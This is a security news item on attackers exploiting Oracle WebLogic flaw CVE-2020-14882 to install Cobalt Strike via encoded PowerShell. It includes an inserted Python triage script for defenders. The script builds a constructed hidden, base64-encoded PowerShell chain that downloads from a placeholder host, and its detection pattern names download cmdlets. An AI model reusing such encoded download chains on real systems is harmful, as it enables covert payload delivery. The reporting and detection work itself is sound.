Critical bug actively used to deploy Cobalt Strike on Oracle servers
2020-11-05 12:55

Threat actors are actively exploiting Oracle WebLogic servers unpatched against CVE-2020-14882 to deploy Cobalt Strike beacons, which allow for persistent remote access to compromised devices.

Cobalt Strike is a legitimate penetration testing tool also used by threat actors in post-exploitation tasks and to deploy so-called beacons that enable them to gain persistent remote access.

The CVE-2020-14882 remote code execution flaw was patched by Oracle during last month's Critical Patch Update, and attackers used it to scan for exposed WebLogic servers one week later.

Attackers are using a chain of base64-encoded PowerShell scripts to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.
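
An added example, not part of the original article: one way a defender could triage logged process command lines for the chained base64-encoded PowerShell described above, unwrapping each layer and flagging download activity. It assumes the chain uses PowerShell's -EncodedCommand switch (base64 of UTF-16LE text); the function names, sample command lines and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# -e, -enc, -EncodedCommand ...: PowerShell accepts any prefix of the name, plus -ec.
ARG = re.compile(r"(?<!\S)[-/](e[a-z]*)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
# Strings that commonly appear when a script fetches a remote payload.
DOWNLOAD = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer",
    re.I)

def encoded_blobs(text):
    """Yield base64 arguments passed to an EncodedCommand-style switch."""
    for name, blob in ARG.findall(text):
        name = name.lower()
        if "encodedcommand".startswith(name) or name == "ec":
            yield blob

def unwrap(cmdline, max_depth=10):
    """Decode nested encoded commands; return decoded layers, outermost first."""
    layers, text = [], cmdline
    for _ in range(max_depth):          # bound the work on hostile input
        blob = next(encoded_blobs(text), None)
        if blob is None:
            break
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:              # bad base64 or not UTF-16LE text
            break
        layers.append(text)
    return layers

def triage(cmdline):
    """Summarise one command line: chain depth, download indicator, last layer."""
    layers = unwrap(cmdline)
    return {"depth": len(layers),
            "downloads": any(DOWNLOAD.search(layer) for layer in layers),
            "final": layers[-1] if layers else ""}

def encode_ps(script):
    """Build constructed sample input the way PowerShell expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed samples, not taken from the incident described on this page.
INNER = "Invoke-WebRequest -Uri http://example.invalid/constructed-sample"
STAGE1 = "powershell -nop -w hidden -enc " + encode_ps(INNER)
SAMPLE_CHAIN = "cmd.exe /c powershell.exe -NoP -EncodedCommand " + encode_ps(STAGE1)
SAMPLE_SINGLE = "powershell.exe -e " + encode_ps("Get-Date")
SAMPLE_BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_CHAIN, SAMPLE_SINGLE, SAMPLE_BENIGN):
        print(triage(line))
```

A depth of two or more combined with a download indicator is worth escalating, especially when the parent process is the WebLogic Java process.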

Cybersecurity firm Spyse, which operates an IT infrastructure search engine, discovered over 3,300 exposed Oracle WebLogic servers potentially vulnerable to CVE-2020-14882 exploits.


News URL

https://www.bleepingcomputer.com/news/security/critical-bug-actively-used-to-deploy-cobalt-strike-on-oracle-servers/

Related Vulnerability

DATE | CVE | VULNERABILITY TITLE | RISK
2020-10-21 | CVE-2020-14882 | Unspecified vulnerability in Oracle Weblogic Server. Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). (network, low complexity, oracle) | critical 9.8

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Oracle 781 388 3148 2078 432 6046